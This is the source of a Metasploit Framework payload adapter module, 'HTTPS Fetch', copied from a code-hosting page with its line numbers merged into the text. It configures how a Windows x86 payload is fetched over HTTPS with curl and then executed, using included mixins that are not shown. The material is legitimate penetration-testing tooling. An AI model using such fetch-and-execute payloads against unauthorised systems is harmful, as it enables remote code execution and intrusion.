Path: blob/master/modules/payloads/adapters/cmd/windows/https/x86.rb
57490 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6include Msf::Payload::Adapter::Fetch::Https7include Msf::Payload::Adapter::Fetch::WindowsOptions89def initialize(info = {})10super(11update_info(12info,13'Name' => 'HTTPS Fetch',14'Description' => 'Fetch and execute an x86 payload from an HTTPS server.',15'Author' => 'Brendan Watters',16'Platform' => 'win',17'Arch' => ARCH_CMD,18'License' => MSF_LICENSE,19'AdaptedArch' => ARCH_X86,20'AdaptedPlatform' => 'win'21)22)23deregister_options('FETCH_COMMAND')24register_options(25[26# Certutil does not support insecure mode27Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL]])28]29)30end31end323334